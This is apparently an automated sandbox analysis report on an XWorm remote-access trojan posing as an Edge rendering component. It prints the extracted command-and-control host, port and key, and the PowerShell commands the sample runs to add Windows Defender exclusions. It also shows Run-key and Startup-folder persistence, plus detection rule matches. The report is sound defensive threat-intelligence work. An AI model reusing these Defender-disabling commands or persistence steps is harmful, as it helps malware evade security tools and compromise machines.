
Windows Analysis Report
msedge_visual_render.exe

Overview

General Information

Sample name: msedge_visual_render.exe
Analysis ID: 1556740
MD5: e796b778b392f06de4d340ec0f88b4cc
SHA1: 32561bf3b022aef8a62bac3e820ef7e3bc648f57
SHA256: 1ff08d4cbe1a41c10692941c7835b93ea5738057dc381cf4704136436911df05
Tags: exe, XWorm, user-aachum

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • msedge_visual_render.exe (PID: 1992 cmdline: "C:\Users\user\Desktop\msedge_visual_render.exe" MD5: E796B778B392F06DE4D340EC0F88B4CC)
    • powershell.exe (PID: 5948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge_visual_render.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msedge.exe (PID: 2408 cmdline: "C:\Users\user\AppData\Roaming\msedge.exe" MD5: E796B778B392F06DE4D340EC0F88B4CC)
  • msedge.exe (PID: 616 cmdline: "C:\Users\user\AppData\Roaming\msedge.exe" MD5: E796B778B392F06DE4D340EC0F88B4CC)
  • cleanup
{"C2 url": ["23.ip.gl.ply.gg"], "Port": 57660, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings
msedge_visual_render.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
msedge_visual_render.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xd94e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xd9eb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xdb00:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xd55c:$cnc4: POST / HTTP/1.1

C:\Users\user\AppData\Roaming\msedge.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Roaming\msedge.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xd94e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xd9eb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xdb00:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xd55c:$cnc4: POST / HTTP/1.1

00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x640e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x64ab:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x65c0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x601c:$cnc4: POST / HTTP/1.1
00000000.00000000.2055237317.00000000003F2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000000.2055237317.00000000003F2000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xd74e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xd7eb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xd900:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xd35c:$cnc4: POST / HTTP/1.1
Process Memory Space: msedge_visual_render.exe PID: 1992 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

0.0.msedge_visual_render.exe.3f0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.0.msedge_visual_render.exe.3f0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xd94e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xd9eb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xdb00:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xd55c:$cnc4: POST / HTTP/1.1

              System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge_visual_render.exe", ParentImage: C:\Users\user\Desktop\msedge_visual_render.exe, ParentProcessId: 1992, ParentProcessName: msedge_visual_render.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', ProcessId: 5948, ProcessName: powershell.exe
Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge_visual_render.exe", ParentImage: C:\Users\user\Desktop\msedge_visual_render.exe, ParentProcessId: 1992, ParentProcessName: msedge_visual_render.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', ProcessId: 5948, ProcessName: powershell.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Roaming\msedge.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\msedge_visual_render.exe, ProcessId: 1992, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge_visual_render.exe", ParentImage: C:\Users\user\Desktop\msedge_visual_render.exe, ParentProcessId: 1992, ParentProcessName: msedge_visual_render.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', ProcessId: 5948, ProcessName: powershell.exe
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: EventID: 11, Image: C:\Users\user\Desktop\msedge_visual_render.exe, ProcessId: 1992, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge_visual_render.exe", ParentImage: C:\Users\user\Desktop\msedge_visual_render.exe, ParentProcessId: 1992, ParentProcessName: msedge_visual_render.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe', ProcessId: 5948, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-15T22:11:56.561263+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49984 | 147.185.221.23 | 57660 | TCP


              AV Detection

Source: msedge_visual_render.exe, Malware Configuration Extractor: Xworm {"C2 url": ["23.ip.gl.ply.gg"], "Port": 57660, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Roaming\msedge.exe, ReversingLabs: Detection: 73%
Source: msedge_visual_render.exe, ReversingLabs: Detection: 73%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\msedge.exe, Joe Sandbox ML: detected
Source: msedge_visual_render.exe, Joe Sandbox ML: detected
Source: msedge_visual_render.exe, String decryptor: 23.ip.gl.ply.gg
Source: msedge_visual_render.exe, String decryptor: 57660
Source: msedge_visual_render.exe, String decryptor: <123456789>
Source: msedge_visual_render.exe, String decryptor: <Xwormmm>
Source: msedge_visual_render.exe, String decryptor: XWorm V5.6
Source: msedge_visual_render.exe, String decryptor: USB.exe
Source: msedge_visual_render.exe, String decryptor: %AppData%
Source: msedge_visual_render.exe, String decryptor: msedge.exe
Source: msedge_visual_render.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: msedge_visual_render.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

Source: Network traffic, Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49984 -> 147.185.221.23:57660
Source: Malware configuration extractor, URLs: 23.ip.gl.ply.gg
Source: global traffic, TCP traffic: 192.168.2.5:49862 -> 147.185.221.23:57660
Source: Joe Sandbox View, IP Address: 147.185.221.23
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: 23.ip.gl.ply.gg
Source: powershell.exe, 00000008.00000002.2362125678.0000020A2B89B000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000008.00000002.2362125678.0000020A2B89B000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000008.00000002.2360202768.0000020A2B710000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000002.00000002.2136913212.000001CFE44C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2213548272.00000184DA741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2344287876.0000020A23251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2122069386.000001CFD4679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2168718628.00000184CA8F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2259166369.0000020A13408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: msedge_visual_render.exe, 00000000.00000002.3303162945.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2122069386.000001CFD4451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2168718628.00000184CA6D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2259166369.0000020A131E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2396438363.000002C7E4681000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2122069386.000001CFD4679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2168718628.00000184CA8F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2259166369.0000020A13408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.2224332852.00000184E2AF8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000008.00000002.2356985034.0000020A2B57F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000002.2122069386.000001CFD4451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2168718628.00000184CA6D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2259166369.0000020A131E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2396438363.000002C7E4681000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.2396438363.000002C7E48A9000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2142783019.000001CFECB60000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://go.m
Source: powershell.exe, 00000002.00000002.2136913212.000001CFE44C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2213548272.00000184DA741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2344287876.0000020A23251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2509527008.000002C7F46F0000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000A.00000002.2526355143.000002C7FC9E2000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://www.verisign.

              Operating System Destruction

Source: C:\Users\user\Desktop\msedge_visual_render.exe, Process information set: 01 00 00 00

              System Summary

Source: msedge_visual_render.exe, type: SAMPLE, Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.msedge_visual_render.exe.3f0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.2055237317.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\msedge.exe, type: DROPPED, Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Code function: 0_2_00007FF848F41689
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Code function: 0_2_00007FF848F48532
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Code function: 0_2_00007FF848F47786
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 5_2_00007FF8490030E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 10_2_00007FF8490030E9
Source: C:\Users\user\AppData\Roaming\msedge.exe, Code function: 13_2_00007FF848F11689
Source: C:\Users\user\AppData\Roaming\msedge.exe, Code function: 13_2_00007FF848F10EFA
Source: C:\Users\user\AppData\Roaming\msedge.exe, Code function: 14_2_00007FF848F31689
Source: C:\Users\user\AppData\Roaming\msedge.exe, Code function: 14_2_00007FF848F30EFA
Source: msedge_visual_render.exe, 00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamemsedge_webVirtual2.exe4 vs msedge_visual_render.exe
Source: msedge_visual_render.exe, 00000000.00000000.2055265238.0000000000402000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenamemsedge_webVirtual2.exe4 vs msedge_visual_render.exe
Source: msedge_visual_render.exe, Binary or memory string: OriginalFilenamemsedge_webVirtual2.exe4 vs msedge_visual_render.exe
Source: msedge_visual_render.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: msedge_visual_render.exe, type: SAMPLE, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.msedge_visual_render.exe.3f0000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.2055237317.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\msedge.exe, type: DROPPED, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: msedge_visual_render.exe, bg5pDCbiKesxiwN0NyC6BFvciFfpHEL1JU4v5uGDqleamvdbu7PjKyTcWLOZ8XQXgK9USGgsC.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: msedge_visual_render.exe, 2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: msedge_visual_render.exe, 2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe.0.dr, bg5pDCbiKesxiwN0NyC6BFvciFfpHEL1JU4v5uGDqleamvdbu7PjKyTcWLOZ8XQXgK9USGgsC.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe.0.dr, 2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe.0.dr, 2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.cs, Cryptographic APIs: 'TransformFinalBlock'
Source: msedge_visual_render.exe, gUeJiTeUFSlCFEA4RMwxWrX8e0AP00tNPBK3Dwxp4LwfuASRUP0W1uO.cs, Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: msedge_visual_render.exe, gUeJiTeUFSlCFEA4RMwxWrX8e0AP00tNPBK3Dwxp4LwfuASRUP0W1uO.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: msedge.exe.0.dr, gUeJiTeUFSlCFEA4RMwxWrX8e0AP00tNPBK3Dwxp4LwfuASRUP0W1uO.cs, Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: msedge.exe.0.dr, gUeJiTeUFSlCFEA4RMwxWrX8e0AP00tNPBK3Dwxp4LwfuASRUP0W1uO.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine, Classification label: mal100.troj.evad.winEXE@15/20@1/1
Source: C:\Users\user\Desktop\msedge_visual_render.exe, File created: C:\Users\user\AppData\Roaming\msedge.exe
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Mutant created: \Sessions\1\BaseNamedObjects\ztbycrrY0E0emVPB
Source: C:\Users\user\AppData\Roaming\msedge.exe, Mutant created: NULL
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ambi105q.wbg.ps1
Source: msedge_visual_render.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: msedge_visual_render.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\msedge_visual_render.exe, File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: msedge_visual_render.exe, ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\msedge_visual_render.exe, File read: C:\Users\user\Desktop\msedge_visual_render.exe
Source: unknown, Process created: C:\Users\user\Desktop\msedge_visual_render.exe "C:\Users\user\Desktop\msedge_visual_render.exe"
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge_visual_render.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msedge.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
